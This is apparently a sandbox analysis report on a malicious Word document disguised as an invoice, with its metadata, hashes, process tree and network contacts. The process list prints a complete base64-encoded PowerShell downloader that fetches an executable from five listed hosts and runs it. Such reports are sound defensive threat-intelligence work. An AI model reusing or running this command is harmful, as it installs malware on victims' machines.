File name: | INV-2019-020892-05-02-2019.doc |
Full analysis: | https://app.any.run/tasks/b8a7201d-13f5-452a-a33a-4ec2a4758af3 |
Verdict: | Malicious activity |
Analysis date: | February 18, 2019, 15:59:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 14:23:00 2019, Last Saved Time/Date: Mon Feb 18 14:23:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0 |
MD5: | 431ADEECFD707340C9314DCAF4ADAA26 |
SHA1: | CFA4E47F345BAF1CA061F6DC4B77CB99FC7412FF |
SHA256: | BDFB3964A30B73108F8A2AF6C99ACDC4A092A6AB46006D300F02B541CA22B217 |
SSDEEP: | 6144:ZG5/BnVfRFJ7KK9aHScdX9znGU/Nu6kvIOSZbO4Vc7co7ta1hw++u+:Z2n9R/lA5dX9znGU/3kvIPO4VYp7ta18 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:02:18 14:23:00 |
ModifyDate: | 2019:02:18 14:23:00 |
Pages: | 1 |
Words: | 1 |
Characters: | 7 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 7 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3136 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INV-2019-020892-05-02-2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2552 | powersheLl -e JABuAF8AXwA0AF8AXwAwADkAPQAoACcARwBfACcAKwAnADcAMgA3ADAAJwApADsAJABVAF8AMwAwADEAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6ADkAXwBfADUANAAwAD0AKAAnAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AMQAnACsAJwAzADkALgA1ACcAKwAnADkALgAnACsAJwA2ADQALgAnACsAJwAxADcAMwAvAEcAJwArACcATgBzACcAKwAnAGQAOABIAEcAYgAnACsAJwBFACcAKwAnAHQAJwArACcAQABoAHQAdABwACcAKwAnADoALwAvADEAMQA4ACcAKwAnAC4AJwArACcAMgA1AC4AMQA3ADYALgAzADgALwBzAHAAJwArACcATAB4AEYAWgBEAFcAJwArACcAQwB5AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwAxADMALgAyADMAMwAuACcAKwAnADMAMQAuADIAMAAnACsAJwAzAC8AJwArACcAcABOAHUAJwArACcAWQBNAEkAUwAnACsAJwBTAEAAaAAnACsAJwB0AHQAcAA6AC8AJwArACcALwAnACsAJwBhAGwAbABlACcAKwAnAG4AcwAnACsAJwAuAHkAJwArACcAbwB1AGMAaABlACcAKwAnAGMAawBpACcAKwAnAHQAJwArACcALgBjAGEALwB5ACcAKwAnAFYAJwArACcAeABFAHYAJwArACcAMQAnACsAJwA5AEAAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8ALwAxADMAJwArACcALgAxACcAKwAnADIAJwArACcANgAuADYAMQAnACsAJwAuADEAMQAvADcAeQB4ACcAKwAnAHQAbABzAFYAUAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABpAF8ANQA0ADEAMQA4AD0AKAAnAE0AJwArACcANwA3AF8ANAAzACcAKQA7ACQAawAyADcAMgBfAF8AMgAgAD0AIAAoACcAOAA5ACcAKwAnADkAJwApADsAJABkAF8AOAA2ADcANwBfAD0AKAAnAGgAJwArACcANAAxADEAJwArACcANwAzADMAJwApADsAJABXADQAMwAyAF8AOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAawAyADcAMgBfAF8AMgArACgAJwAuAGUAJwArACcAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAG0ANQBfAF8ANQA3ACAAaQBuACAAJAB6ADkAXwBfADUANAAwACkAewB0AHIAeQB7ACQAVQBfADMAMAAxAF8ALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbQA1AF8AXwA1ADcALAAgACQAVwA0ADMAMgBfADgAKQA7ACQAYgA4AF8AXwBfADQAXwA3AD0AKAAnAE0AXwAwADgAJwArACcAOABfACcAKwAnADIAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAVwA0ADMAMgBfADgAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABXADQAMwAyAF8AOAA7ACQATgA2AF8AOAAwADcAPQAoACcARQAzACcAKwAnADEANABfAF8ANgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAagAwADIANAA5ADEAPQAoACcARQAwAF8AMAAnACsAJwA4ADMAJwApADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREAE1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2552 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UURXY0255KLDCWAULAI0.temp | — | |
MD5:— | SHA256:— | |||
2552 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2552 | powersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f8cb.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:D276C6F9AE2BBDEECCABCF48BFEA8C06 | SHA256:41D66D177CF5A965A4F44BCE2DB3080B0E482DE876606535BC830DDD2AC7D9FC | |||
3136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INV-2019-020892-05-02-2019.doc.LNK | lnk | |
MD5:6E0C0266E937216437B5F4BCA9F9081A | SHA256:07E9DFD56D5E048AB57521004C3387F63D854B0BAF68733F9F6A71C22240F4D8 | |||
3136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:DF6BAF51CD51A8506DA72D09C5E61066 | SHA256:28D02C9318B0220AFB938A3545102DB146E18B67E8682987CD08E5741F8E4BA8 | |||
3136 | WINWORD.EXE | C:\Users\admin\Desktop\~$V-2019-020892-05-02-2019.doc | pgc | |
MD5:35F90011FB69995F74542C3A9015C0C4 | SHA256:6372C3FF92A970AA6D71D2880C3A30D689AF7F947A90A62C3C6D6B3EE2D61747 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2552 | powersheLl.exe | GET | 404 | 13.233.31.203:80 | http://13.233.31.203/pNuYMISS | IN | xml | 345 b | suspicious |
2552 | powersheLl.exe | GET | 404 | 118.25.176.38:80 | http://118.25.176.38/spLxFZDWCy | CN | xml | 345 b | malicious |
2552 | powersheLl.exe | GET | 404 | 138.197.128.108:80 | http://allens.youcheckit.ca/yVxEv19 | CA | xml | 345 b | malicious |
2552 | powersheLl.exe | GET | 404 | 13.126.61.11:80 | http://13.126.61.11/7yxtlsVP | IN | xml | 345 b | unknown |
2552 | powersheLl.exe | GET | 404 | 139.59.64.173:80 | http://139.59.64.173/GNsd8HGbEt | IN | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2552 | powersheLl.exe | 139.59.64.173:80 | — | Digital Ocean, Inc. | IN | suspicious |
2552 | powersheLl.exe | 13.233.31.203:80 | — | Amazon.com, Inc. | IN | suspicious |
2552 | powersheLl.exe | 118.25.176.38:80 | — | — | CN | malicious |
2552 | powersheLl.exe | 13.126.61.11:80 | — | Amazon.com, Inc. | IN | unknown |
2552 | powersheLl.exe | 138.197.128.108:80 | allens.youcheckit.ca | Digital Ocean, Inc. | CA | malicious |
Domain | IP | Reputation |
---|---|---|
allens.youcheckit.ca |
| malicious |